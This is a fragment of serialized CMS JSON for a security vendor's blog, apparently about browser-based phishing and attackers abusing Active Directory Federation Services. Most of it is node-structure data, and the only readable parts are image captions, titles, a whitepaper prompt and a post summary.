,{"nodeType":250,"data":89260,"content":89261},{},[89262,89271,89280],{"nodeType":254,"data":89263,"content":89264},{},[89265],{"nodeType":178,"data":89266,"content":89267},{},[89268],{"nodeType":173,"value":74259,"marks":89269,"data":89270},[],{},{"nodeType":254,"data":89272,"content":89273},{},[89274],{"nodeType":178,"data":89275,"content":89276},{},[89277],{"nodeType":173,"value":74269,"marks":89278,"data":89279},[],{},{"nodeType":254,"data":89281,"content":89282},{},[89283],{"nodeType":178,"data":89284,"content":89285},{},[89286,89289,89293],{"nodeType":173,"value":74279,"marks":89287,"data":89288},[],{},{"nodeType":173,"value":62931,"marks":89290,"data":89292},[89291],{"type":1646},{},{"nodeType":173,"value":74287,"marks":89294,"data":89295},[],{},{"nodeType":178,"data":89297,"content":89298},{},[89299,89302,89306,89309,89316],{"nodeType":173,"value":74294,"marks":89300,"data":89301},[],{},{"nodeType":173,"value":74298,"marks":89303,"data":89305},[89304],{"type":370},{},{"nodeType":173,"value":74303,"marks":89307,"data":89308},[],{},{"nodeType":186,"data":89310,"content":89311},{"uri":1034},[89312],{"nodeType":173,"value":74310,"marks":89313,"data":89315},[89314],{"type":194},{},{"nodeType":173,"value":74315,"marks":89317,"data":89318},[],{},{"nodeType":178,"data":89320,"content":89321},{},[89322],{"nodeType":173,"value":74322,"marks":89323,"data":89324},[],{},{"nodeType":250,"data":89326,"content":89327},{},[89328,89337,89346,89355,89374,89383],{"nodeType":254,"data":89329,"content":89330},{},[89331],{"nodeType":178,"data":89332,"content":89333},{},[89334],{"nodeType":173,"value":74335,"marks":89335,"data":89336},[],{},{"nodeType":254,"data":89338,"content":89339},{},[89340],{"nodeType":178,"data":89341,"content":89342},{},[89343],{"nodeType":173,"value":74345,"marks":89344,"data":89345},[],{},{"nodeType":254,"data":89347,"content":89348},{},[89349],{"nodeType":178,"data":89350,"content":89351},{},[89352],{"nodeType":173,"value":74355,"marks":89353,"data":89354},[],{},{"nodeType":254,"data":89356,"content":89357},{},[89358],{"nodeType":178,"data":89359,"content":89360},{},[89361,89364,89371],{"nodeType":173,"value":74365,"marks":89362,"data":89363},[],{},{"nodeType":186,"data":89365,"content":89366},{"uri":74370},[89367],{"nodeType":173,"value":74373,"marks":89368,"data":89370},[89369],{"type":194},{},{"nodeType":173,"value":74378,"marks":89372,"data":89373},[],{},{"nodeType":254,"data":89375,"content":89376},{},[89377],{"nodeType":178,"data":89378,"content":89379},{},[89380],{"nodeType":173,"value":74388,"marks":89381,"data":89382},[],{},{"nodeType":254,"data":89384,"content":89385},{},[89386],{"nodeType":178,"data":89387,"content":89388},{},[89389],{"nodeType":173,"value":74398,"marks":89390,"data":89391},[],{},{"nodeType":312,"data":89393,"content":89396},{"target":89394},{"sys":89395},{"id":74405,"type":317,"linkType":318},[],{"nodeType":231,"data":89398,"content":89399},{},[],{"nodeType":169,"data":89401,"content":89402},{},[89403],{"nodeType":173,"value":40632,"marks":89404,"data":89406},[89405],{"type":370},{},{"nodeType":178,"data":89408,"content":89409},{},[89410],{"nodeType":173,"value":74421,"marks":89411,"data":89412},[],{},{"nodeType":178,"data":89414,"content":89415},{},[89416,89419,89426],{"nodeType":173,"value":74428,"marks":89417,"data":89418},[],{},{"nodeType":186,"data":89420,"content":89421},{"uri":74433},[89422],{"nodeType":173,"value":74436,"marks":89423,"data":89425},[89424],{"type":194},{},{"nodeType":173,"value":74441,"marks":89427,"data":89428},[],{},{"nodeType":231,"data":89430,"content":89431},{},[],{"nodeType":169,"data":89433,"content":89434},{},[89435],{"nodeType":173,"value":71801,"marks":89436,"data":89438},[89437],{"type":370},{},{"nodeType":178,"data":89440,"content":89441},{},[89442],{"nodeType":173,"value":74458,"marks":89443,"data":89444},[],{},{"nodeType":178,"data":89446,"content":89447},{},[89448,89451,89458],{"nodeType":173,"value":59468,"marks":89449,"data":89450},[],{},{"nodeType":186,"data":89452,"content":89453},{"uri":1469},[89454],{"nodeType":173,"value":1472,"marks":89455,"data":89457},[89456],{"type":194},{},{"nodeType":173,"value":1477,"marks":89459,"data":89460},[],{},{"entries":89462},{"hyperlink":89463,"inline":89464,"block":89465},[],[],[89466,89469,89472,89478,89482,89490,89494,89497],{"sys":89467,"__typename":5345,"title":78133,"caption":78133,"layoutMode":118,"file":89468},{"id":27027},{"url":78135,"width":78136,"height":78137},{"sys":89470,"__typename":15269,"type":15270,"ctaText":89471,"buttonLabel":67302,"buttonColour":72847,"buttonUrl":70840},{"id":73817},"Read how the transformation of business IT has shaped the evolution of phishing attacks in our latest whitepaper.",{"sys":89473,"__typename":5345,"title":89474,"caption":89474,"layoutMode":118,"file":89475},{"id":73941},"EDR solved endpoint attacks by getting deep visibility into OS-level processes and activity — we now face a similar visibility problem in the browser. ",{"url":89476,"width":5358,"height":89477},"https://images.ctfassets.net/y1cdw1ablpvd/2KuUuYKf2Q9TlIJ9fkOI82/9a52cae72564e69d3cfe8b3b613eb950/image5.png",632,{"sys":89479,"__typename":5345,"title":86963,"caption":86963,"layoutMode":118,"file":89480},{"id":73974},{"url":89481,"width":5358,"height":80142},"https://images.ctfassets.net/y1cdw1ablpvd/4p8sf1x8PfWF06ndwTsdf9/136ed45c7912459a70dbb53b62cf5a90/image6.png",{"sys":89483,"__typename":5345,"title":89484,"caption":89485,"layoutMode":118,"file":89486},{"id":73987},"Cloudflare Turnstile is a simple way for attackers to block automated analysis of their phishing kits — it should probably come with a trigger warning for incident responders.","Cloudflare Turnstile is a simple way for security teams to prevent automated analysis — it should probably come with a trigger warning for incident responders.",{"url":89487,"width":89488,"height":89489},"https://images.ctfassets.net/y1cdw1ablpvd/6gGDHL1jECCm4j02gZZlYe/92e4362eea9fb712aeb64bdd7fb19d59/image3.png",1262,464,{"sys":89491,"__typename":5434,"title":89492,"arcadeDemoUrl":89493,"playText":5437},{"id":61243},"MFA Downgrade Demo","https://demo.arcade.software/1MzRfFaRCD2pYPhIXkvi?embed",{"sys":89495,"__typename":5345,"title":78140,"caption":78141,"layoutMode":118,"file":89496},{"id":27078},{"url":78143,"width":78144,"height":78145},{"sys":89498,"__typename":5345,"title":89499,"caption":89499,"layoutMode":118,"file":89500},{"id":74405},"Being in the browser gives you unrivalled visibility of phishing page activity and user behavior.",{"url":89501,"width":29270,"height":6837},"https://images.ctfassets.net/y1cdw1ablpvd/42mmDkjfXn0uOkTyvFLNqG/0385dadcb0731bea1de1ca5ae6ee7c18/image1.png","content:blog:how-the-browser-became-the-main-cyber-battleground.json","blog/how-the-browser-became-the-main-cyber-battleground.json","blog/how-the-browser-became-the-main-cyber-battleground",{"_path":89506,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":89507,"ogImage":118,"summary":89509,"title":70368,"subtitle":118,"metaTitle":89520,"synopsis":70369,"hashTags":118,"publishedDate":70370,"slug":70371,"tagsCollection":89521,"relatedBlogPostsCollection":89527,"authorsCollection":90887,"content":90891,"_id":91433,"_type":5439,"_source":5440,"_file":91434,"_stem":91435,"_extension":5439},"/blog/phishing-with-active-directory-federation-services",{"id":69777,"publishedAt":89508},"2025-11-18T09:23:34.166Z",{"json":89510},{"data":89511,"content":89512,"nodeType":165},{},[89513],{"data":89514,"content":89515,"nodeType":178},{},[89516],{"data":89517,"marks":89518,"value":89519,"nodeType":173},{},[],"We recently identified a novel phishing attack combining the latest phishing detection evasion techniques —  including clever use of Active Directory Federation Services to get Microsoft to send victims to a phishing site using legitimate login URLs. ","Attackers are using legit Microsoft services for phishing",{"items":89522},[89523,89525],{"sys":89524,"name":509},{"id":508},{"sys":89526,"name":505},{"id":504},{"items":89528},[89529,89921,90404],{"__typename":1528,"sys":89530,"content":89531,"title":58422,"synopsis":58423,"hashTags":118,"publishedDate":58424,"slug":58425,"tagsCollection":89911,"authorsCollection":89917},{"id":57991},{"json":89532},{"nodeType":165,"data":89533,"content":89534},{},[89535,89551,89564,89569,89575,89581,89584,89591,89606,89612,89617,89623,89628,89634,89639,89645,89650,89656,89661,89664,89671,89687,89692,89699,89715,89722,89748,89754,89761,89777,89784,89800,89805,89808,89815,89831,89837,89842,89845,89852,89868,89874,89880,89885],{"nodeType":178,"data":89536,"content":89537},{},[89538,89541,89548],{"nodeType":173,"value":58000,"marks":89539,"data":89540},[],{},{"nodeType":186,"data":89542,"content":89543},{"uri":6820},[89544],{"nodeType":173,"value":8157,"marks":89545,"data":89547},[89546],{"type":194},{},{"nodeType":173,"value":197,"marks":89549,"data":89550},[],{},{"nodeType":178,"data":89552,"content":89553},{},[89554,89557,89561],{"nodeType":173,"value":58017,"marks":89555,"data":89556},[],{},{"nodeType":173,"value":58021,"marks":89558,"data":89560},[89559],{"type":370},{},{"nodeType":173,"value":58026,"marks":89562,"data":89563},[],{},{"nodeType":312,"data":89565,"content":89568},{"target":89566},{"sys":89567},{"id":58033,"type":317,"linkType":318},[],{"nodeType":178,"data":89570,"content":89571},{},[89572],{"nodeType":173,"value":58039,"marks":89573,"data":89574},[],{},{"nodeType":178,"data":89576,"content":89577},{},[89578],{"nodeType":173,"value":58046,"marks":89579,"data":89580},[],{},{"nodeType":231,"data":89582,"content":89583},{},[],{"nodeType":169,"data":89585,"content":89586},{},[89587],{"nodeType":173,"value":58056,"marks":89588,"data":89590},[89589],{"type":370},{},{"nodeType":178,"data":89592,"content":89593},{},[89594,89597,89603],{"nodeType":173,"value":58064,"marks":89595,"data":89596},[],{},{"nodeType":186,"data":89598,"content":89599},{"uri":58069},[89600],{"nodeType":173,"value":58072,"marks":89601,"data":89602},[],{},{"nodeType":173,"value":3107,"marks":89604,"data":89605},[],{},{"nodeType":178,"data":89607,"content":89608},{},[89609],{"nodeType":173,"value":58082,"marks":89610,"data":89611},[],{},{"nodeType":312,"data":89613,"content":89616},{"target":89614},{"sys":89615},{"id":58089,"type":317,"linkType":318},[],{"nodeType":178,"data":89618,"content":89619},{},[89620],{"nodeType":173,"value":58095,"marks":89621,"data":89622},[],{},{"nodeType":312,"data":89624,"content":89627},{"target":89625},{"sys":89626},{"id":58102,"type":317,"linkType":318},[],{"nodeType":178,"data":89629,"content":89630},{},[89631],{"nodeType":173,"value":58108,"marks":89632,"data":89633},[],{},{"nodeType":312,"data":89635,"content":89638},{"target":89636},{"sys":89637},{"id":58115,"type":317,"linkType":318},[],{"nodeType":178,"data":89640,"content":89641},{},[89642],{"nodeType":173,"value":58121,"marks":89643,"data":89644},[],{},{"nodeType":312,"data":89646,"content":89649},{"target":89647},{"sys":89648},{"id":58128,"type":317,"linkType":318},[],{"nodeType":178,"data":89651,"content":89652},{},[89653],{"nodeType":173,"value":58134,"marks":89654,"data":89655},[],{},{"nodeType":312,"data":89657,"content":89660},{"target":89658},{"sys":89659},{"id":58141,"type":317,"linkType":318},[],{"nodeType":231,"data":89662,"content":89663},{},[],{"nodeType":169,"data":89665,"content":89666},{},[89667],{"nodeType":173,"value":58150,"marks":89668,"data":89670},[89669],{"type":370},{},{"nodeType":178,"data":89672,"content":89673},{},[89674,89677,89684],{"nodeType":173,"value":58158,"marks":89675,"data":89676},[],{},{"nodeType":186,"data":89678,"content":89679},{"uri":6820},[89680],{"nodeType":173,"value":8157,"marks":89681,"data":89683},[89682],{"type":194},{},{"nodeType":173,"value":58169,"marks":89685,"data":89686},[],{},{"nodeType":312,"data":89688,"content":89691},{"target":89689},{"sys":89690},{"id":58176,"type":317,"linkType":318},[],{"nodeType":235,"data":89693,"content":89694},{},[89695],{"nodeType":173,"value":58182,"marks":89696,"data":89698},[89697],{"type":370},{},{"nodeType":178,"data":89700,"content":89701},{},[89702,89705,89712],{"nodeType":173,"value":58190,"marks":89703,"data":89704},[],{},{"nodeType":186,"data":89706,"content":89707},{"uri":58195},[89708],{"nodeType":173,"value":58198,"marks":89709,"data":89711},[89710],{"type":194},{},{"nodeType":173,"value":58203,"marks":89713,"data":89714},[],{},{"nodeType":235,"data":89716,"content":89717},{},[89718],{"nodeType":173,"value":58210,"marks":89719,"data":89721},[89720],{"type":370},{},{"nodeType":178,"data":89723,"content":89724},{},[89725,89728,89735,89738,89745],{"nodeType":173,"value":58218,"marks":89726,"data":89727},[],{},{"nodeType":186,"data":89729,"content":89730},{"uri":8419},[89731],{"nodeType":173,"value":58225,"marks":89732,"data":89734},[89733],{"type":194},{},{"nodeType":173,"value":58230,"marks":89736,"data":89737},[],{},{"nodeType":186,"data":89739,"content":89740},{"uri":58235},[89741],{"nodeType":173,"value":58238,"marks":89742,"data":89744},[89743],{"type":194},{},{"nodeType":173,"value":58243,"marks":89746,"data":89747},[],{},{"nodeType":178,"data":89749,"content":89750},{},[89751],{"nodeType":173,"value":58250,"marks":89752,"data":89753},[],{},{"nodeType":235,"data":89755,"content":89756},{},[89757],{"nodeType":173,"value":58257,"marks":89758,"data":89760},[89759],{"type":370},{},{"nodeType":178,"data":89762,"content":89763},{},[89764,89767,89774],{"nodeType":173,"value":50021,"marks":89765,"data":89766},[],{},{"nodeType":186,"data":89768,"content":89769},{"uri":50026},[89770],{"nodeType":173,"value":50029,"marks":89771,"data":89773},[89772],{"type":194},{},{"nodeType":173,"value":50034,"marks":89775,"data":89776},[],{},{"nodeType":235,"data":89778,"content":89779},{},[89780],{"nodeType":173,"value":58281,"marks":89781,"data":89783},[89782],{"type":370},{},{"nodeType":178,"data":89785,"content":89786},{},[89787,89790,89797],{"nodeType":173,"value":58289,"marks":89788,"data":89789},[],{},{"nodeType":186,"data":89791,"content":89792},{"uri":50125},[89793],{"nodeType":173,"value":58296,"marks":89794,"data":89796},[89795],{"type":194},{},{"nodeType":173,"value":58301,"marks":89798,"data":89799},[],{},{"nodeType":312,"data":89801,"content":89804},{"target":89802},{"sys":89803},{"id":58308,"type":317,"linkType":318},[],{"nodeType":231,"data":89806,"content":89807},{},[],{"nodeType":169,"data":89809,"content":89810},{},[89811],{"nodeType":173,"value":8967,"marks":89812,"data":89814},[89813],{"type":370},{},{"nodeType":178,"data":89816,"content":89817},{},[89818,89821,89828],{"nodeType":173,"value":58324,"marks":89819,"data":89820},[],{},{"nodeType":186,"data":89822,"content":89823},{"uri":1764},[89824],{"nodeType":173,"value":58331,"marks":89825,"data":89827},[89826],{"type":194},{},{"nodeType":173,"value":58336,"marks":89829,"data":89830},[],{},{"nodeType":178,"data":89832,"content":89833},{},[89834],{"nodeType":173,"value":58343,"marks":89835,"data":89836},[],{},{"nodeType":312,"data":89838,"content":89841},{"target":89839},{"sys":89840},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":89843,"content":89844},{},[],{"nodeType":169,"data":89846,"content":89847},{},[89848],{"nodeType":173,"value":8517,"marks":89849,"data":89851},[89850],{"type":370},{},{"nodeType":178,"data":89853,"content":89854},{},[89855,89858,89865],{"nodeType":173,"value":8538,"marks":89856,"data":89857},[],{},{"nodeType":186,"data":89859,"content":89860},{"uri":6820},[89861],{"nodeType":173,"value":8545,"marks":89862,"data":89864},[89863],{"type":194},{},{"nodeType":173,"value":8550,"marks":89866,"data":89867},[],{},{"nodeType":178,"data":89869,"content":89870},{},[89871],{"nodeType":173,"value":26673,"marks":89872,"data":89873},[],{},{"nodeType":178,"data":89875,"content":89876},{},[89877],{"nodeType":173,"value":58387,"marks":89878,"data":89879},[],{},{"nodeType":312,"data":89881,"content":89884},{"target":89882},{"sys":89883},{"id":58394,"type":317,"linkType":318},[],{"nodeType":178,"data":89886,"content":89887},{},[89888,89891,89898,89901,89908],{"nodeType":173,"value":1451,"marks":89889,"data":89890},[],{},{"nodeType":186,"data":89892,"content":89893},{"uri":1456},[89894],{"nodeType":173,"value":1459,"marks":89895,"data":89897},[89896],{"type":194},{},{"nodeType":173,"value":1464,"marks":89899,"data":89900},[],{},{"nodeType":186,"data":89902,"content":89903},{"uri":1469},[89904],{"nodeType":173,"value":1472,"marks":89905,"data":89907},[89906],{"type":194},{},{"nodeType":173,"value":1477,"marks":89909,"data":89910},[],{},{"items":89912},[89913,89915],{"sys":89914,"name":509},{"id":508},{"sys":89916,"name":505},{"id":504},{"items":89918},[89919],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":89920},{"url":1496},{"__typename":1528,"sys":89922,"content":89923,"title":46292,"synopsis":50301,"hashTags":118,"publishedDate":50302,"slug":46293,"tagsCollection":90394,"authorsCollection":90400},{"id":24196},{"json":89924},{"nodeType":165,"data":89925,"content":89926},{},[89927,89933,89939,89965,89971,89977,89983,89986,89993,90009,90015,90020,90026,90031,90037,90042,90048,90053,90059,90064,90070,90076,90081,90084,90091,90107,90113,90119,90124,90140,90147,90163,90170,90186,90192,90197,90223,90230,90256,90263,90279,90284,90287,90294,90310,90315,90318,90325,90331,90337,90340,90347,90353,90359,90383,90388],{"nodeType":178,"data":89928,"content":89929},{},[89930],{"nodeType":173,"value":49766,"marks":89931,"data":89932},[],{},{"nodeType":178,"data":89934,"content":89935},{},[89936],{"nodeType":173,"value":39774,"marks":89937,"data":89938},[],{},{"nodeType":178,"data":89940,"content":89941},{},[89942,89945,89952,89955,89962],{"nodeType":173,"value":39781,"marks":89943,"data":89944},[],{},{"nodeType":186,"data":89946,"content":89947},{"uri":49783},[89948],{"nodeType":173,"value":39789,"marks":89949,"data":89951},[89950],{"type":194},{},{"nodeType":173,"value":9534,"marks":89953,"data":89954},[],{},{"nodeType":186,"data":89956,"content":89957},{"uri":6820},[89958],{"nodeType":173,"value":8157,"marks":89959,"data":89961},[89960],{"type":194},{},{"nodeType":173,"value":49800,"marks":89963,"data":89964},[],{},{"nodeType":178,"data":89966,"content":89967},{},[89968],{"nodeType":173,"value":49807,"marks":89969,"data":89970},[],{},{"nodeType":178,"data":89972,"content":89973},{},[89974],{"nodeType":173,"value":49814,"marks":89975,"data":89976},[],{},{"nodeType":178,"data":89978,"content":89979},{},[89980],{"nodeType":173,"value":49821,"marks":89981,"data":89982},[],{},{"nodeType":231,"data":89984,"content":89985},{},[],{"nodeType":169,"data":89987,"content":89988},{},[89989],{"nodeType":173,"value":49831,"marks":89990,"data":89992},[89991],{"type":370},{},{"nodeType":178,"data":89994,"content":89995},{},[89996,89999,90006],{"nodeType":173,"value":49839,"marks":89997,"data":89998},[],{},{"nodeType":186,"data":90000,"content":90001},{"uri":49844},[90002],{"nodeType":173,"value":49847,"marks":90003,"data":90005},[90004],{"type":194},{},{"nodeType":173,"value":49852,"marks":90007,"data":90008},[],{},{"nodeType":178,"data":90010,"content":90011},{},[90012],{"nodeType":173,"value":49859,"marks":90013,"data":90014},[],{},{"nodeType":312,"data":90016,"content":90019},{"target":90017},{"sys":90018},{"id":49866,"type":317,"linkType":318},[],{"nodeType":178,"data":90021,"content":90022},{},[90023],{"nodeType":173,"value":49872,"marks":90024,"data":90025},[],{},{"nodeType":312,"data":90027,"content":90030},{"target":90028},{"sys":90029},{"id":49879,"type":317,"linkType":318},[],{"nodeType":178,"data":90032,"content":90033},{},[90034],{"nodeType":173,"value":49885,"marks":90035,"data":90036},[],{},{"nodeType":312,"data":90038,"content":90041},{"target":90039},{"sys":90040},{"id":49892,"type":317,"linkType":318},[],{"nodeType":178,"data":90043,"content":90044},{},[90045],{"nodeType":173,"value":49898,"marks":90046,"data":90047},[],{},{"nodeType":312,"data":90049,"content":90052},{"target":90050},{"sys":90051},{"id":49905,"type":317,"linkType":318},[],{"nodeType":178,"data":90054,"content":90055},{},[90056],{"nodeType":173,"value":49911,"marks":90057,"data":90058},[],{},{"nodeType":312,"data":90060,"content":90063},{"target":90061},{"sys":90062},{"id":49918,"type":317,"linkType":318},[],{"nodeType":178,"data":90065,"content":90066},{},[90067],{"nodeType":173,"value":49924,"marks":90068,"data":90069},[],{},{"nodeType":178,"data":90071,"content":90072},{},[90073],{"nodeType":173,"value":49931,"marks":90074,"data":90075},[],{},{"nodeType":312,"data":90077,"content":90080},{"target":90078},{"sys":90079},{"id":49938,"type":317,"linkType":318},[],{"nodeType":231,"data":90082,"content":90083},{},[],{"nodeType":169,"data":90085,"content":90086},{},[90087],{"nodeType":173,"value":49947,"marks":90088,"data":90090},[90089],{"type":370},{},{"nodeType":178,"data":90092,"content":90093},{},[90094,90097,90104],{"nodeType":173,"value":49955,"marks":90095,"data":90096},[],{},{"nodeType":186,"data":90098,"content":90099},{"uri":49960},[90100],{"nodeType":173,"value":49963,"marks":90101,"data":90103},[90102],{"type":194},{},{"nodeType":173,"value":49968,"marks":90105,"data":90106},[],{},{"nodeType":178,"data":90108,"content":90109},{},[90110],{"nodeType":173,"value":49975,"marks":90111,"data":90112},[],{},{"nodeType":178,"data":90114,"content":90115},{},[90116],{"nodeType":173,"value":49982,"marks":90117,"data":90118},[],{},{"nodeType":312,"data":90120,"content":90123},{"target":90121},{"sys":90122},{"id":49989,"type":317,"linkType":318},[],{"nodeType":178,"data":90125,"content":90126},{},[90127,90130,90137],{"nodeType":173,"value":49995,"marks":90128,"data":90129},[],{},{"nodeType":186,"data":90131,"content":90132},{"uri":6820},[90133],{"nodeType":173,"value":8157,"marks":90134,"data":90136},[90135],{"type":194},{},{"nodeType":173,"value":50006,"marks":90138,"data":90139},[],{},{"nodeType":235,"data":90141,"content":90142},{},[90143],{"nodeType":173,"value":50013,"marks":90144,"data":90146},[90145],{"type":370},{},{"nodeType":178,"data":90148,"content":90149},{},[90150,90153,90160],{"nodeType":173,"value":50021,"marks":90151,"data":90152},[],{},{"nodeType":186,"data":90154,"content":90155},{"uri":50026},[90156],{"nodeType":173,"value":50029,"marks":90157,"data":90159},[90158],{"type":194},{},{"nodeType":173,"value":50034,"marks":90161,"data":90162},[],{},{"nodeType":235,"data":90164,"content":90165},{},[90166],{"nodeType":173,"value":50041,"marks":90167,"data":90169},[90168],{"type":370},{},{"nodeType":178,"data":90171,"content":90172},{},[90173,90176,90183],{"nodeType":173,"value":37,"marks":90174,"data":90175},[],{},{"nodeType":186,"data":90177,"content":90178},{"uri":7853},[90179],{"nodeType":173,"value":50055,"marks":90180,"data":90182},[90181],{"type":194},{},{"nodeType":173,"value":50060,"marks":90184,"data":90185},[],{},{"nodeType":178,"data":90187,"content":90188},{},[90189],{"nodeType":173,"value":50067,"marks":90190,"data":90191},[],{},{"nodeType":312,"data":90193,"content":90196},{"target":90194},{"sys":90195},{"id":50074,"type":317,"linkType":318},[],{"nodeType":178,"data":90198,"content":90199},{},[90200,90203,90210,90213,90220],{"nodeType":173,"value":50080,"marks":90201,"data":90202},[],{},{"nodeType":186,"data":90204,"content":90205},{"uri":42062},[90206],{"nodeType":173,"value":50087,"marks":90207,"data":90209},[90208],{"type":194},{},{"nodeType":173,"value":50092,"marks":90211,"data":90212},[],{},{"nodeType":186,"data":90214,"content":90215},{"uri":50097},[90216],{"nodeType":173,"value":50100,"marks":90217,"data":90219},[90218],{"type":194},{},{"nodeType":173,"value":50105,"marks":90221,"data":90222},[],{},{"nodeType":235,"data":90224,"content":90225},{},[90226],{"nodeType":173,"value":50112,"marks":90227,"data":90229},[90228],{"type":370},{},{"nodeType":178,"data":90231,"content":90232},{},[90233,90236,90243,90246,90253],{"nodeType":173,"value":50120,"marks":90234,"data":90235},[],{},{"nodeType":186,"data":90237,"content":90238},{"uri":50125},[90239],{"nodeType":173,"value":50128,"marks":90240,"data":90242},[90241],{"type":194},{},{"nodeType":173,"value":50133,"marks":90244,"data":90245},[],{},{"nodeType":186,"data":90247,"content":90248},{"uri":50138},[90249],{"nodeType":173,"value":50141,"marks":90250,"data":90252},[90251],{"type":194},{},{"nodeType":173,"value":50146,"marks":90254,"data":90255},[],{},{"nodeType":235,"data":90257,"content":90258},{},[90259],{"nodeType":173,"value":50153,"marks":90260,"data":90262},[90261],{"type":370},{},{"nodeType":178,"data":90264,"content":90265},{},[90266,90269,90276],{"nodeType":173,"value":50161,"marks":90267,"data":90268},[],{},{"nodeType":186,"data":90270,"content":90271},{"uri":50166},[90272],{"nodeType":173,"value":50169,"marks":90273,"data":90275},[90274],{"type":194},{},{"nodeType":173,"value":50174,"marks":90277,"data":90278},[],{},{"nodeType":312,"data":90280,"content":90283},{"target":90281},{"sys":90282},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":90285,"content":90286},{},[],{"nodeType":169,"data":90288,"content":90289},{},[90290],{"nodeType":173,"value":50189,"marks":90291,"data":90293},[90292],{"type":370},{},{"nodeType":178,"data":90295,"content":90296},{},[90297,90300,90307],{"nodeType":173,"value":50197,"marks":90298,"data":90299},[],{},{"nodeType":186,"data":90301,"content":90302},{"uri":50202},[90303],{"nodeType":173,"value":50205,"marks":90304,"data":90306},[90305],{"type":194},{},{"nodeType":173,"value":50210,"marks":90308,"data":90309},[],{},{"nodeType":312,"data":90311,"content":90314},{"target":90312},{"sys":90313},{"id":50217,"type":317,"linkType":318},[],{"nodeType":231,"data":90316,"content":90317},{},[],{"nodeType":169,"data":90319,"content":90320},{},[90321],{"nodeType":173,"value":40632,"marks":90322,"data":90324},[90323],{"type":370},{},{"nodeType":178,"data":90326,"content":90327},{},[90328],{"nodeType":173,"value":50233,"marks":90329,"data":90330},[],{},{"nodeType":178,"data":90332,"content":90333},{},[90334],{"nodeType":173,"value":50240,"marks":90335,"data":90336},[],{},{"nodeType":231,"data":90338,"content":90339},{},[],{"nodeType":169,"data":90341,"content":90342},{},[90343],{"nodeType":173,"value":1422,"marks":90344,"data":90346},[90345],{"type":370},{},{"nodeType":178,"data":90348,"content":90349},{},[90350],{"nodeType":173,"value":42238,"marks":90351,"data":90352},[],{},{"nodeType":178,"data":90354,"content":90355},{},[90356],{"nodeType":173,"value":50263,"marks":90357,"data":90358},[],{},{"nodeType":178,"data":90360,"content":90361},{},[90362,90365,90371,90374,90380],{"nodeType":173,"value":1451,"marks":90363,"data":90364},[],{},{"nodeType":186,"data":90366,"content":90367},{"uri":1456},[90368],{"nodeType":173,"value":1459,"marks":90369,"data":90370},[],{},{"nodeType":173,"value":1464,"marks":90372,"data":90373},[],{},{"nodeType":186,"data":90375,"content":90376},{"uri":1469},[90377],{"nodeType":173,"value":1472,"marks":90378,"data":90379},[],{},{"nodeType":173,"value":1477,"marks":90381,"data":90382},[],{},{"nodeType":312,"data":90384,"content":90387},{"target":90385},{"sys":90386},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":90389,"content":90390},{},[90391],{"nodeType":173,"value":37,"marks":90392,"data":90393},[],{},{"items":90395},[90396,90398],{"sys":90397,"name":505},{"id":504},{"sys":90399,"name":509},{"id":508},{"items":90401},[90402],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":90403},{"url":1496},{"__typename":1528,"sys":90405,"content":90406,"title":46282,"synopsis":88772,"hashTags":118,"publishedDate":88773,"slug":46283,"tagsCollection":90877,"authorsCollection":90883},{"id":24126},{"json":90407},{"data":90408,"content":90409,"nodeType":165},{},[90410,90426,90432,90453,90459,90465,90471,90487,90492,90495,90502,90508,90524,90560,90596,90622,90638,90643,90646,90653,90659,90665,90671,90677,90784,90790,90793,90800,90816,90831,90834,90841,90856,90862],{"data":90411,"content":90412,"nodeType":178},{},[90413,90416,90423],{"data":90414,"marks":90415,"value":88236,"nodeType":173},{},[],{"data":90417,"content":90418,"nodeType":186},{"uri":88239},[90419],{"data":90420,"marks":90421,"value":88245,"nodeType":173},{},[90422],{"type":194},{"data":90424,"marks":90425,"value":88249,"nodeType":173},{},[],{"data":90427,"content":90428,"nodeType":178},{},[90429],{"data":90430,"marks":90431,"value":88256,"nodeType":173},{},[],{"data":90433,"content":90434,"nodeType":250},{},[90435,90444],{"data":90436,"content":90437,"nodeType":254},{},[90438],{"data":90439,"content":90440,"nodeType":178},{},[90441],{"data":90442,"marks":90443,"value":88269,"nodeType":173},{},[],{"data":90445,"content":90446,"nodeType":254},{},[90447],{"data":90448,"content":90449,"nodeType":178},{},[90450],{"data":90451,"marks":90452,"value":88279,"nodeType":173},{},[],{"data":90454,"content":90455,"nodeType":178},{},[90456],{"data":90457,"marks":90458,"value":88286,"nodeType":173},{},[],{"data":90460,"content":90461,"nodeType":178},{},[90462],{"data":90463,"marks":90464,"value":88293,"nodeType":173},{},[],{"data":90466,"content":90467,"nodeType":178},{},[90468],{"data":90469,"marks":90470,"value":88300,"nodeType":173},{},[],{"data":90472,"content":90473,"nodeType":178},{},[90474,90477,90484],{"data":90475,"marks":90476,"value":88307,"nodeType":173},{},[],{"data":90478,"content":90479,"nodeType":186},{"uri":24215},[90480],{"data":90481,"marks":90482,"value":88315,"nodeType":173},{},[90483],{"type":194},{"data":90485,"marks":90486,"value":88319,"nodeType":173},{},[],{"data":90488,"content":90491,"nodeType":312},{"target":90489},{"sys":90490},{"id":88324,"type":317,"linkType":318},[],{"data":90493,"content":90494,"nodeType":231},{},[],{"data":90496,"content":90497,"nodeType":169},{},[90498],{"data":90499,"marks":90500,"value":88336,"nodeType":173},{},[90501],{"type":370},{"data":90503,"content":90504,"nodeType":178},{},[90505],{"data":90506,"marks":90507,"value":88343,"nodeType":173},{},[],{"data":90509,"content":90510,"nodeType":178},{},[90511,90514,90521],{"data":90512,"marks":90513,"value":88350,"nodeType":173},{},[],{"data":90515,"content":90516,"nodeType":186},{"uri":88353},[90517],{"data":90518,"marks":90519,"value":88359,"nodeType":173},{},[90520],{"type":194},{"data":90522,"marks":90523,"value":88363,"nodeType":173},{},[],{"data":90525,"content":90526,"nodeType":178},{},[90527,90530,90537,90540,90547,90550,90557],{"data":90528,"marks":90529,"value":88370,"nodeType":173},{},[],{"data":90531,"content":90532,"nodeType":186},{"uri":62896},[90533],{"data":90534,"marks":90535,"value":88378,"nodeType":173},{},[90536],{"type":194},{"data":90538,"marks":90539,"value":88382,"nodeType":173},{},[],{"data":90541,"content":90542,"nodeType":186},{"uri":50026},[90543],{"data":90544,"marks":90545,"value":88390,"nodeType":173},{},[90546],{"type":194},{"data":90548,"marks":90549,"value":88394,"nodeType":173},{},[],{"data":90551,"content":9055